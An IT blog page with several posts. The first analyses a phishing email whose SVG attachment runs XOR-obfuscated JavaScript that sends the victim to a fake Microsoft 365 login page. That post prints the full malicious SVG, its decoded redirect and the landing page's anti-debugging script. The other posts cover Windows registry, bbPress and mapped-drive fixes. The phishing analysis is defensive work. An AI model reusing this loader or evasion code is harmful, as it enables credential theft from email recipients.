Jason Rush

To Do/Your-To-do-List 7/8/2025

These emails seem to be coming in with just a title indicating some kind of To Do list (“To Do”, “Your-To-do-List 7/8/2025”, etc). There is no email body/content. They have a single SVG “image” file as an attachment (“List.svg”, “ToDoList.svg”, etc).

User Actions Path

A user opens the SVG file, and then the SVG file opens a webpage. After a redirect or two, we reach a Microsoft 365-looking login page filled with the user’s email address.

Technical Breakdown

The SVG file appears to be the bare minimum required for an SVG to load properly, along with a script block that executes a block of JavaScript code.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">
<script>
<![CDATA[

w = 'anNtaXRoQGV4YW1wbGUuY29t';
(() => { const G = "67b98c9df336eb2505f54f80"; const p = "415e0c5d57141708095052420c0d5c1b58470353145b1851425800115802713606181106062a101e12785079164d1a490f4f401258070b5106181146010b101e12001e57164d1f774645451258007e0006181100290f101e17631c79134d584a784d02121a017e1c441811070637101e176f166f134d585a7c03021258066a220618117b291b101e50645b551d4d4f0b"; const V = (C) => C.match(/.{2}/g) || []; const Y = (n) => String.fromCodePoint(new Uint16Array([n])[0]); const O = []; V(p).forEach((h, K) => { const c = parseInt(h, 16); const y = G.codePointAt(K % G.length); O.push(Y(c ^ y)); }); const j = O.join(''); const E = { toJSON: () => (new Function(j).call(window), {}) }; JSON.stringify(E); })();
]]>
</script>
</svg>

The JavaScript code cleaned up a bit:

w = 'anNtaXRoQGV4YW1wbGUuY29t';
(
    () => {
        const G = "67b98c9df336eb2505f54f80";
        const p = "415e0c5d57141708095052420c0d5c1b58470353145b1851425800115802713606181106062a101e12785079164d1a490f4f401258070b5106181146010b101e12001e57164d1f774645451258007e0006181100290f101e17631c79134d584a784d02121a017e1c441811070637101e176f166f134d585a7c03021258066a220618117b291b101e50645b551d4d4f0b";
        const V = (C) => C.match(/.{2}/g) || [];
        const Y = (n) => String.fromCodePoint(new Uint16Array([n])[0]);
        const O = [];
        V(p).forEach((h, K) => {
            const c = parseInt(h, 16);
            const y = G.codePointAt(K % G.length);
            O.push(Y(c ^ y));
        });
        const j = O.join('');
        const E = {
            toJSON: () => (new Function(j).call(window), {})
        };
        JSON.stringify(E);
    }
)();

Variable ‘w’ is the recipient’s email address, base64-encoded. The rest of the code is used to decode the malicious URL that will soon be opened. Variables ‘G’ and ‘p’ are used by the forEach loop to create a character array. The character array decodes to executable JavaScript code.

window.location.href = atob(`aHR`+"0cH"+"M6L"+"y9x"+`d25`+"pdi"+"5xb"+'Gpr'+`cGd`+"6Lm"+'VzL'+`zNz`+"bGx"+"1cU"+'ZpZ'+`jJ4`+`eSF`+"MLy"+`Q=`)+w;

The atob() function base64 decodes the string to the final base URL (“hXXps://qwniv.qljkpgz.es/3slluqFif2xy!L/$”) and appends the base64 encoded email address at the end (“hXXps://qwniv.qljkpgz.es/3slluqFif2xy!L/$anNtaXRoQGV4YW1wbGUuY29t”).

Based on response headers, this seems to be a Laravel site cached behind Cloudflare. The response is more Javascript.

<script src="https://cdn.jsdelivr.net/npm/lz-string@1.4.4/libs/lz-string.min.js"></script>
<script>
    ( () => {
        const k = [103, 108, 111, 98, 97, 108, 84, 104, 105, 115].map(b => String.fromCharCode(b)).join('');
        const q = (typeof window !== 'undefined' ? window : typeof global !== 'undefined' ? global : typeof self !== 'undefined' ? self : {});
        const l = [101, 118, 97, 108].map(v => String.fromCharCode(v)).join('');
        const p = [76, 90, 83, 116, 114, 105, 110, 103, 46, 100, 101, 99, 111, 109, 112, 114, 101, 115, 115, 70, 114, 111, 109, 66, 97, 115, 101, 54, 52].map(t => String.fromCharCode(t)).join('');
        const u = q[l] || q[k][l];
        const y = q['LZString'] || q[k]['LZString'];
        const a = y ? y[p.split('.')[1]] : null;
        if (a && u) {
            const e = "OoUwagxg8gXgtgVSgTwAQF5U[...]1jSlIb0aU59vZMmUsgEJAgAA==";
            const f = a(e);
            if (f) {
                u(f);
            }
        }
    }
    )();
</script>

‘l’ evaluates to ‘eval’.
‘p’ evaluates to ‘LZString.decompressFromBase64’.
This section base64 decodes the string in variable ‘e’ and decompresses it using the sourced lz-string script, then evaluates the results.
I didn’t bother to manually base64 decode and LZ decompress the results, but I used the browser’s dev tools to extract them here.

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener("keydown", function (event) {
    function ru(event) {
        const bz = [
            { keyCode: 123 },
            { ctrl: true, keyCode: 85 },
            { ctrl: true, shift: true, keyCode: 73 },
            { ctrl: true, shift: true, keyCode: 67 },
            { ctrl: true, shift: true, keyCode: 74 },
            { ctrl: true, shift: true, keyCode: 75 },
            { ctrl: true, keyCode: 72 }, // Ctrl + H
            { meta: true, alt: true, keyCode: 73 },
            { meta: true, alt: true, keyCode: 67 },
            { meta: true, keyCode: 85 }
        ];

        return bz.some(wh =>
            (!wh.ctrl || event.ctrlKey) &&
            (!wh.shift || event.shiftKey) &&
            (!wh.meta || event.metaKey) &&
            (!wh.alt || event.altKey) &&
            event.keyCode === wh.keyCode
        );
    }

    if (ru(event)) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
jf = false;
(function pr() {
    let nh = false;
    const tb = 100;
    setInterval(function() {
        const dc = performance.now();
        debugger;
        const ca = performance.now();
        if (ca - dc > tb && !nh) {
            jf = true;
            nh = true;
            window.location.replace('https://www.alibaba.com');
        }
    }, 100);
})();

The window.location.replace() function at the end seems to be randomized. On previous loads it has redirected to Google, Etsy, etc. instead. The keycode section disables the F12 shortcut for debug tools, Ctrl+u, Ctrl+h, etc. The ‘contextmenu’ section disables right-click. This script appears to be designed to prevent debuggers and other testing tools from determining the site’s intended behavior.

While I didn’t dig in deep enough to bypass these blocks, I was able to also identify an additional URL that seems to be more base64-encoded and encrypted code (“hXXps://qwniv.qljkpgz.es/34lyO2PtsMG1uOs1WIGV6RuCpaKyghDAX1fYS389110”).

When loading the page without DevTools open, I get a reload to another page with junk arguments designed to resemble a proper Microsoft 365 login page URL.

hXXps://qwniv.qljkpgz.es/ys8j94c04hovq?common/oauth2/v2.0/authorize?client_id=020f1417be-a5f57659-c2a811891d05d91-7c06544b-5f8[…]11b86971a&locales=en

I ended my investigation here.

Can’t rename folders (Error 0x80004005)

The Situation

Rename Folder
An unexpected error is keeping you from renaming the folder. If you continue to receive this error, you can use the error code to search for help with this problem.
Error 0x80004005: Unspecified error

You are running into the above error when you try one of the following:

Rename folders (or possibly files).
Creating and naming a new folder (or possibly file). The folder (or possibly file) was created but was left with a default name like “New folder”, “New folder (2)”, etc.

This may or may not be specific to OneDrive users and paths. I currently have a sample size of two (one being a random forum thread).

The Cause

I found a forum thread at edugeek that touched on the issue I was having. The thread was describing a slightly different instance of this same issue.

The Windows Registry includes a key named “User Shell Folders” which contain a series of name:string pairs. These values tell Windows Explorer what the actual path is for folders that can be redirected.

Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

As far as I can tell, when you try to rename a folder Windows Explorer tries to parse some (or maybe all) of these paths. If there is a malformed path set for one of these folders, this error is returned and the rename fails.

The example in the referenced edugeek forum thread above was a user customizing their path. They had a typo using “%USERPROFILES%” (with a trailing ‘S’) instead of “%USERPROFILE%” in their customized path. This nonexistent variable seemed to cause their failure.

My failure was slightly different. I’m not sure what caused the issue as I was working on a computer I hadn’t touched before. I found one of the GUID-named pairs had a value of “%USERPROFILE\Pictures”. The lack of a closing ‘%’ character defining the USERPROFILE variable name caused my failure.

It’s been a while since I’ve done in-depth work with Folder Redirection via GPO, but keep in mind that GPOs may set registry values as well. If you find this value periodically changing back, there may be a Local Policy or Group Policy ultimately (re)setting this value.

The Solution

The edugeek thread and I resolved our issues by finding which registry value(s) were malformed and correcting them.

WARNING: Obligatory warning that making changes in the Windows Registry has a possibility of bricking your computer if you do something wrong. Be careful, and consider taking Registry or computer-level backups first.

Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Open Regedit, navigate to the “User Shell Folders” key, and review the data values for all of the registry entries listed. You will likely find one or more entries where the “%USERPROFILE%” variable is somehow malformed. Note the original value(s) and/or back up the registry, then fix the values as needed. Your issue should be resolved immediately without requiring a reboot or log out/in

Fatal error: Uncaught Error: Class ‘BBP_BuddyPress_Activity’ not found

bbPress patched function setup_components()

Investigation

A client of mine wanted to disable the activity stream, went to Dashboard > Settings > BuddyPress > Components > Activity Streams, and Unticked the option. After they hit save, the site displayed the error ‘There has been a critical error on this website’ and the entire website (including admin dashboard) was unreachable/unusable (only returning this error). Under the hood, I found the error was “Fatal error: Uncaught Error: Class ‘BBP_BuddyPress_Activity’ not found”.

WordPress version: 5.7
bbPress Version 2.6.6

So I enabled debugging info in the wp-config.php file and received the full error (paths sanitized for security):

Fatal error: Uncaught Error: Class 'BBP_BuddyPress_Activity' not found in public_html/wp-content/plugins/bbpress/includes/extend/buddypress/loader.php:153 Stack trace:
 0 public_html/wp-includes/class-wp-hook.php(292): BBP_Forums_Component->setup_components('')
 1 public_html/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters(NULL, Array)
 2 public_html/wp-includes/plugin.php(484): WP_Hook->do_action(Array)
 3 public_html/wp-content/plugins/buddypress/bp-core/bp-core-dependency.php(267): do_action('bp_init')
 4 public_html/wp-includes/class-wp-hook.php(292): bp_init('')
 5 public_html/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters(NULL, Array)
 6 public_html/wp-includes/plugin.php(484): WP_Hook->do_action(Array)
 7 public_html/wp-settings.php(560): do_action('init')
 8 public_html/wp-co in public_html/wp-content/plugins/bbpress/includes/extend/buddypress/loader.php on line 153

Because of the last line, I checked Line 153 of loader.php (as referenced above), which brought me to the ‘setup_components()’ function. Line 153 is the ‘new BBP_BuddyPress_Activity() line.

    /**
     * Instantiate classes for BuddyPress integration
     *
     * @since 2.0.0 bbPress (r3395)
     */
    public function setup_components() {

            // Always load the members component
            bbpress()->extend->buddypress->members = new BBP_BuddyPress_Members();

            // Create new activity class
            if ( bp_is_active( 'activity' ) ) {
                    bbpress()->extend->buddypress->activity = new BBP_BuddyPress_Activity();
            }

            // Register the group extension only if groups are active
            if ( bbp_is_group_forums_active() && bp_is_active( 'groups' ) ) {
                    bp_register_group_extension( 'BBP_Forums_Group_Extension' );
            }
    }

Resolution

From this, I was able to determine that bbPress thought the ‘Activity’ component was enabled, but for some reason did not have the ‘BBP_BuddyPress_Activity’ class loaded. I was able to temporarily resolve the issue by patching the ‘setup_components()’ function in the file ‘wp-content/plugins/bbpress/includes/extend/buddypress/loader.php’ with a few lines in order to manually include the ‘BBP_BuddyPress_Activity’ class if necessary:


                // Create new activity class
                if ( bp_is_active( 'activity' ) ) {
// Temporary patch!
if ( ! class_exists( 'BBP_BuddyPress_Activity' ) ){
require_once(dirname(__FILE__).'/activity.php');
}
                        bbpress()->extend->buddypress->activity = new BBP_BuddyPress_Activity();
                }

As I have patched a file within the plugin, it will be overwritten if any upgrades come out for the plugin. Because of that, I have opened a ticket in the bbPress Trac system to look for a final resolution that will survive plugin upgrades (hopefully through an update to the bbPress plugin itself).

0x800708ca This network connection does not exist

I was recently adding an additional mapped drive to an existing GPO, but the drive would not appear no matter what changes I made to the various settings (Create/Replace/Update, adding a Delete first, setting this or all drives to show, etc). Frustrated, I started digging into the event viewer and found this error:

0x800708ca This network connection does not exist

I searched online for this error and kept finding results where people were trying to get rid of existing mapped drives but were unable to. This was the opposite of what I was after! Finally I ran across a forum thread where one of the troubleshooting steps a user mentioned was to check for spaces in the drive description. I didn’t have any spaces in the drive description, but that got me thinking. A quick glance showed the functioning drives paths did *not* end with a trailing slash, but the failing drive mapping did (see following example). I removed the trailing slash, ran gpupdate on a computer, and the drive instantly appeared.

\\server\path\that\works
\\server\path\that\fails\

DocuSign Phishing

Over the last week or so I’ve received two batches of slightly different DocuSign phishing attempts. They are typical “click a link in the email that downloads a malicious .doc you have to enable macros in” attacks, though the first time I’ve seen DocuSign as the bluff. Also somewhat interesting that these attacks seem to actually be coming from variants of DocuSign’s domain, instead of random hacked/commandeered email accounts. Continue reading “DocuSign Phishing”